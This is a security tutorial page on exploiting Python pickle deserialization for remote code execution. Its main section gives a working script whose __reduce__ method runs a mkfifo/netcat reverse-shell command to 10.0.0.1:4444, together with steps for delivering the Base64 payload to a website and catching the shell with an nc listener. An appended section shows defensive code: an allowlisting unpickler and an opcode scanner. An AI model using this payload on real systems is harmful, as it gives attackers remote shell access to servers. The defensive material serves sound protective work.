Python Pickle RCE
Last modified: 2023-08-10
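The Python “pickle” module serializes and deserializes Python objects. Deserializing untrusted data with it can lead to remote code execution, because a pickle can tell the loader to call an arbitrary callable. If the website unpickles data we control, we may be able to execute arbitrary code.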
Exploitation
Below is the Python script (mypickle.py) to generate the payload for a reverse shell.
import pickle
import base64
import os

class RCE:
    # pickle records what __reduce__ returns; on load, the returned
    # callable is invoked with the returned argument tuple.
    def __reduce__(self):
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4444 > /tmp/f')
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    # Standard Base64
    print(base64.b64encode(pickled))
    # or URL-safe Base64
    print(base64.urlsafe_b64encode(pickled))
Now run this script to generate the Base64 payload.
python3 mypickle.py
Copy the output Base64 string and paste it into the place on the website where the payload takes effect.
Before reloading the web page, start a listener on the local machine.
nc -lvnp 4444
Then reload the page. We should get a shell in the local terminal.
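On the defending side, the mechanism above (a `__reduce__` that names a callable) is blocked by refusing global lookups during unpickling and can be spotted by inspecting the opcode stream without loading it. The following is an added example, not part of the original page; `ALLOWED_GLOBALS`, `safe_loads`, `referenced_globals` and the harmless `Probe` sample are assumptions made for illustration.

```python
import io
import os
import pickle
import pickletools

# Assumed allowlist: the only globals this application's pickles may reference.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup that is not explicitly allowlisted."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")

def safe_loads(data: bytes):
    """Drop-in for pickle.loads() that enforces ALLOWED_GLOBALS."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

def referenced_globals(data: bytes):
    """List the (module, name) pairs a pickle would import, without loading it."""
    # Triage heuristic only: STACK_GLOBAL operands are guessed from the two most
    # recent string pushes, so memoized strings can mislead it.
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):   # arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif opcode.name == "STACK_GLOBAL":      # protocol 4+: operands on the stack
            found.append(tuple(strings[-2:]) if len(strings) >= 2 else ("?", "?"))
        elif isinstance(arg, str):
            strings.append(arg)
    return found

class Probe:
    """Constructed, harmless sample: its __reduce__ names os.getpid."""
    def __reduce__(self):
        return os.getpid, ()

if __name__ == "__main__":
    sample = pickle.dumps(Probe())
    print("globals:", referenced_globals(sample))
    print("plain data:", safe_loads(pickle.dumps({"user": "alice", "roles": ["admin"]})))
    try:
        safe_loads(sample)
    except pickle.UnpicklingError as exc:
        print("refused:", exc)
```

The allowlist in `find_class` is the enforcing control; the opcode scan is only suitable for logging and triage of received blobs. Where the data is plain values, a format such as JSON avoids the problem entirely.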